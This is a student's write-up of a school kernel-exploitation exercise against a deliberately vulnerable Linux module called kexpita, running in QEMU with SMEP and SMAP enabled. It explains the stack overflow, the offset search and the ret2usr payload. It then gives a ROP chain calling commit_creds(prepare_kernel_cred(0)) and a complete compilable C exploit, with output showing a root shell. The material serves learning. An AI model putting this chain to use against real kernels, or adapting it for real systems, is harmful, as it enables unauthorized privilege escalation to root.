TL;DR

Buffer overflow in a kernel module β†’ RIP control β†’ ROP chain to bypass SMEP/SMAP β†’ commit_creds(prepare_kernel_cred(0)) β†’ root shell πŸ”“


Note: This is my first kernel exploitation writeup! This was a school project at EPITA, not a CTF challenge. I was learning kernel security concepts for the first time, so the approach might not be the most optimized. Feedback welcome! πŸ™‚


Challenge Overview

This is a class project where we had to exploit a vulnerable kernel module called kexpita. The module is a character device driver with a classic buffer overflow vulnerability.

Environment:

  • Linux kernel 5.15.180
  • x86_64 architecture
  • QEMU virtualization
  • SMEP & SMAP enabled (the hard part!)
  • KASLR & KPTI disabled (to keep things manageable for learning)
qemu-system-x86_64 \
    -m 128M \
    -cpu kvm64,+smep,+smap \
    -kernel bzImage \
    -initrd initramfs.cpio.gz \
    -append "console=ttyS0 nopti nokaslr quiet panic=1" \
    -s

What is ret2usr?

Before diving in, let’s understand the classic attack we’re building on:

ret2usr (return-to-user) is a kernel exploitation technique where you hijack kernel execution to jump to attacker-controlled code in userspace. Here’s how it works:

  1. Corrupt kernel stack via buffer overflow
  2. Redirect RIP to a userspace function
  3. Execute privileged operations in kernel mode (your code runs as ring 0!)
  4. Escalate privileges via commit_creds(prepare_kernel_cred(0))
  5. Return cleanly to userspace with root privileges

The catch: Modern kernels have SMEP (Supervisor Mode Execution Prevention) which blocks executing userspace code from kernel mode. So we need ROP instead! 🎯

Memory Layout (x86_64)

Understanding the memory split is key:

Userspace:   0x0000000000000000 β†’ 0x00007FFFFFFFFFFF
Kernelspace: 0xFFFF800000000000 β†’ 0xFFFFFFFFFFFFFFFF

Transitions happen via swapgs (segment switch) and iretq (privilege level change).

The Vulnerability

Here’s the vulnerable kernel module code:

#define BUFFER_SIZE 0x400

static ssize_t kexpita_write(struct file *file,
      const char __user *buf, size_t count,
      loff_t *f_pos)
{
  char kbuf[BUFFER_SIZE] = { 0 };  // Stack buffer
  printk(KERN_INFO "module_write called\n");
  
  // No size check on count! 🚨
  if (_copy_from_user(kbuf, buf, count)) {
    printk(KERN_INFO "copy_from_user failed\n");
    return -EINVAL;
  }
  
  memcpy(g_buf, kbuf, BUFFER_SIZE);
  return count;
}

The bug: copy_from_user() uses the user-provided count without validation. We can send more than BUFFER_SIZE (0x400) bytes and overflow the kernel stack!

Finding the Offset

Classic cyclic pattern approach to find where we control RIP:

char pattern[] = "aaaabaaacaaadaaaeaaafaaagaaahaaaiaaaj...";
write(fd, pattern, 0x430);

Kernel crashes with RIP = 0x6b61616e6b6161

$ cyclic -l 0x6b61616e6b6161
1049  # 0x419 bytes

But accounting for calling convention, the actual RIP offset is 0x418 bytes.

Exploitation Strategy

Phase 1: Without SMEP/SMAP (Easy Mode)

When SMEP/SMAP are disabled, we can use classic ret2usr:

void privesc() {
    asm(".intel_syntax noprefix;"
        "movabs rax, prepare_kernel_cred;"
        "xor rdi, rdi;"        // arg: 0 for root
        "call rax;"            // RAX = new cred struct
        "mov rdi, rax;"        // arg: cred pointer
        "movabs rax, commit_creds;"
        "call rax;"            // Apply root creds
        
        "swapgs;"              // Switch to userspace GS
        
        // Build iretq frame
        "mov r15, user_ss;"
        "push r15;"
        "mov r15, user_sp;"
        "push r15;"
        "mov r15, user_rflags;"
        "push r15;"
        "mov r15, user_cs;"
        "push r15;"
        "mov r15, user_rip;"
        "push r15;"
        
        "iretq;"               // Return to userspace
        ".att_syntax;");
}

Just overwrite RIP with address of privesc() and boom, root! But that’s the easy part…

Phase 2: With SMEP/SMAP (Real Challenge)

SMEP prevents executing userspace code from kernel mode. So we need a pure ROP solution using only kernel gadgets.

The goal: Call commit_creds(prepare_kernel_cred(0)) entirely with ROP.

Kernel Symbol Discovery

Since KASLR is disabled, kernel addresses are static:

uint64_t prepare_kernel_cred = 0xffffffff81097e80;
uint64_t commit_creds = 0xffffffff81097bd0;

These are found via /proc/kallsyms:

$ cat /proc/kallsyms | grep prepare_kernel_cred
ffffffff81097e80 T prepare_kernel_cred

$ cat /proc/kallsyms | grep commit_creds
ffffffff81097bd0 T commit_creds

The ROP Challenge: RAX β†’ RDI

Here’s the tricky part. We need to:

  1. Call prepare_kernel_cred(0) β†’ returns pointer in RAX
  2. Move that pointer to RDI
  3. Call commit_creds(rdi)

Problem: There’s no simple mov rdi, rax gadget in the kernel!

Finding Gadgets

We need to search the kernel image for useful gadgets. I used ropper but kernel files aren’t normal ELFs, so we need to extract the code first:

# Extract kernel code
$ python3 extract_kernel.py bzImage vmlinux.bin

# Find gadgets
$ ropper --file vmlinux.bin --search "pop rdi"

But ropper gives us relative offsets, not absolute addresses!

Address Calculator

I wrote a quick Python script to convert offsets to real kernel addresses:

#!/usr/bin/env python3
import sys

BASE_ADDR = 0xffffffff81000000  # kernel base

def main():
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <offset>")
        sys.exit(1)
    
    offset = int(sys.argv[1], 16) if sys.argv[1].startswith("0x") else int(sys.argv[1])
    final_addr = BASE_ADDR + offset
    print(f"[+] Calculated address: {hex(final_addr)}")

if __name__ == "__main__":
    main()

Usage:

$ python3 calc_addr.py 0x15b0cd
[+] Calculated address: 0xffffffff8115b0cd  # pop rdi ; ret

Gadget Validation

Always verify gadgets in GDB before using them:

pwndbg> x/3i 0xffffffff8115b0cd
=> 0xffffffff8115b0cd: pop    rdi
   0xffffffff8115b0ce: ret    
   0xffffffff8115b0cf: nop

The Solution: Push-Pop Chaining

Since we can’t do mov rdi, rax, we chain gadgets creatively:

Key gadgets:

pop_rdi_ret          = 0xffffffff8115b0cd  # pop rdi ; ret
pop_rdx_ret          = 0xffffffff81053898  # pop rdx ; ret  
push_rax_jmp_rdx     = 0xffffffff813d134c  # push rax ; jmp rdx

The trick:

  1. Put pop_rdi_ret address in RDX
  2. Call push_rax_jmp_rdx
  3. This pushes RAX to stack, then jumps to pop_rdi_ret
  4. The pop loads RAX value into RDI!

Mind = blown 🀯

Building the ROP Chain

void overflow(){
    char payload[0x800];  
    memset(payload, 'A', sizeof(payload));
    uint64_t *ptr = (uint64_t *)payload;
    
    // Pad to saved registers (calling convention)
    ptr[0x400/8] = 0x4141414141414141;  // RBX  
    ptr[0x408/8] = 0x4242424242424242;  // RBP
    ptr[0x410/8] = 0x4343434343434343;  // R12
    
    // ROP chain starts at offset 0x418 (saved RIP)
    uint64_t *rop = &ptr[0x418/8];
    int i = 0;
    
    // === Phase 1: prepare_kernel_cred(0) ===
    rop[i++] = pop_rdi_ret;
    rop[i++] = 0;                        // RDI = 0 (root)
    rop[i++] = prepare_kernel_cred;      // Call it, result in RAX
    
    // === Phase 2: Transfer RAX β†’ RDI ===
    rop[i++] = pop_rdx_ret;
    rop[i++] = pop_rdi_ret;              // RDX = address of "pop rdi ; ret"
    rop[i++] = push_rax_jmp_rdx;         // Push RAX, jump to pop_rdi_ret
                                         // β†’ RDI now contains RAX!
    
    // === Phase 3: commit_creds(cred) ===
    rop[i++] = commit_creds;             // RDI already set from above
    
    // === Phase 4: Return to userspace ===
    rop[i++] = swapgs_restore_regs_and_return_to_usermode;
    
    // swapgs_restore expects 15 registers on stack
    rop[i++] = 0;  // r15
    rop[i++] = 0;  // r14
    rop[i++] = 0;  // r13
    rop[i++] = 0;  // r12
    rop[i++] = 0;  // rbp
    rop[i++] = 0;  // rbx
    rop[i++] = 0;  // r11
    rop[i++] = 0;  // r10
    rop[i++] = 0;  // r9
    rop[i++] = 0;  // r8
    rop[i++] = 0;  // rax
    rop[i++] = 0;  // rcx
    rop[i++] = 0;  // rdx
    rop[i++] = 0;  // rsi
    rop[i++] = 0;  // rdi
    
    // orig_ax (syscall context marker)
    rop[i++] = 0xffffffffffffffff;
    
    // iretq frame (return to userspace)
    rop[i++] = user_rip;     // RIP β†’ spawn_shell()
    rop[i++] = user_cs;      // CS (0x33)
    rop[i++] = user_rflags;  // RFLAGS
    rop[i++] = user_sp;      // RSP
    rop[i++] = user_ss;      // SS (0x2b)
    
    size_t total = 0x418 + (i * 8);
    write(global_fd, payload, total);
}

The Magic of swapgs_restore_regs_and_return_to_usermode

This kernel function is a gift for exploitation:

  1. Restores all registers from stack (R15β†’RDI in order)
  2. Executes swapgs to switch to userspace segment
  3. Performs iretq for atomic transition to ring 3

It’s like the kernel saying “here, let me help you return to userspace cleanly” πŸ˜…

Post-Exploitation: Stable Shell

To avoid segfaults after the exploit, we use fork():

void spawn_shell() {
    if (getuid() == 0) {
        printf("[+] got root (uid = 0)\n");
        
        if (fork() == 0) {
            // Child: clean process without corrupted stack
            execl("/bin/sh", "sh", NULL);
            exit(0);
        } else {
            // Parent: wait for shell to exit
            wait(NULL);
            puts("[*] Shell exited");
            exit(0);
        }
    }
}

Why fork? The parent process has a corrupted kernel stack. Forking creates a “clean” child that inherits root privileges but without the corruption!

Complete Exploit

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>

// Kernel symbols (no KASLR)
uint64_t prepare_kernel_cred = 0xffffffff81097e80;
uint64_t commit_creds = 0xffffffff81097bd0;

// ROP gadgets
uint64_t pop_rdi_ret = 0xffffffff8115b0cd;
uint64_t pop_rdx_ret = 0xffffffff81053898;
uint64_t push_rax_jmp_rdx = 0xffffffff813d134c;
uint64_t swapgs_restore_regs_and_return_to_usermode = 0xffffffff81a00a70;

// Userspace state (saved before triggering exploit)
uint64_t user_cs, user_ss, user_rflags, user_sp, user_rip;

int global_fd;

void save_state() {
    asm(
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
    );
    user_rip = (uint64_t)spawn_shell;
}

void spawn_shell() {
    if (getuid() == 0) {
        printf("[+] got root!\n");
        if (fork() == 0) {
            execl("/bin/sh", "sh", NULL);
            exit(0);
        }
        wait(NULL);
        exit(0);
    }
}

void overflow() {
    char payload[0x800];  
    memset(payload, 'A', sizeof(payload));
    uint64_t *ptr = (uint64_t *)payload;
    
    ptr[0x400/8] = 0x4141414141414141;
    ptr[0x408/8] = 0x4242424242424242;
    ptr[0x410/8] = 0x4343434343434343;
    
    uint64_t *rop = &ptr[0x418/8];
    int i = 0;
    
    rop[i++] = pop_rdi_ret;
    rop[i++] = 0;
    rop[i++] = prepare_kernel_cred;
    
    rop[i++] = pop_rdx_ret;
    rop[i++] = pop_rdi_ret;
    rop[i++] = push_rax_jmp_rdx;
    
    rop[i++] = commit_creds;
    
    rop[i++] = swapgs_restore_regs_and_return_to_usermode;
    rop[i++] = 0; rop[i++] = 0; rop[i++] = 0; rop[i++] = 0; rop[i++] = 0;
    rop[i++] = 0; rop[i++] = 0; rop[i++] = 0; rop[i++] = 0; rop[i++] = 0;
    rop[i++] = 0; rop[i++] = 0; rop[i++] = 0; rop[i++] = 0; rop[i++] = 0;
    
    rop[i++] = 0xffffffffffffffff;
    
    rop[i++] = user_rip;
    rop[i++] = user_cs;
    rop[i++] = user_rflags;
    rop[i++] = user_sp;
    rop[i++] = user_ss;
    
    size_t total = 0x418 + (i * 8);
    write(global_fd, payload, total);
}

int main() {
    printf("[*] Opening /dev/kexpita\n");
    global_fd = open("/dev/kexpita", O_RDWR);
    if (global_fd < 0) {
        perror("open");
        exit(1);
    }
    
    printf("[*] Saving userspace state\n");
    save_state();
    
    printf("[*] Triggering overflow\n");
    overflow();
    
    printf("[!] Should not reach here\n");
    close(global_fd);
    return 0;
}

Running the Exploit

$ gcc -o exploit exploit.c -static
$ ./exploit
[*] Opening /dev/kexpita
[*] Saving userspace state
[*] Triggering overflow
[+] got root!
# id
uid=0(root) gid=0(root) groups=0(root)
# 

Root shell achieved! πŸŽ‰

Lessons Learned

Kernel exploitation techniques:

  1. ret2usr vs ROP - Understanding when you can use userspace code vs when you need pure kernel gadgets (SMEP)

  2. Gadget hunting in kernels - Kernel binaries aren’t standard ELFs, need special extraction and analysis

  3. Register transfer creativity - When there’s no direct gadget, chain multiple gadgets (push-pop technique)

  4. Calling conventions - Understanding x86_64 ABI for function calls and register usage

  5. State restoration - Using kernel’s own cleanup functions (swapgs_restore_regs_and_return_to_usermode)

  6. Stack corruption handling - Forking to create stable shell from corrupted process

  7. Kernel symbols - Using /proc/kallsyms for address discovery (when KASLR is off)

Key insight: Modern protections like SMEP/SMAP make exploitation harder, but with enough kernel gadgets, you can still build a complete privilege escalation chain. The kernel itself gives you the tools to break it! πŸ”“


Resources that helped: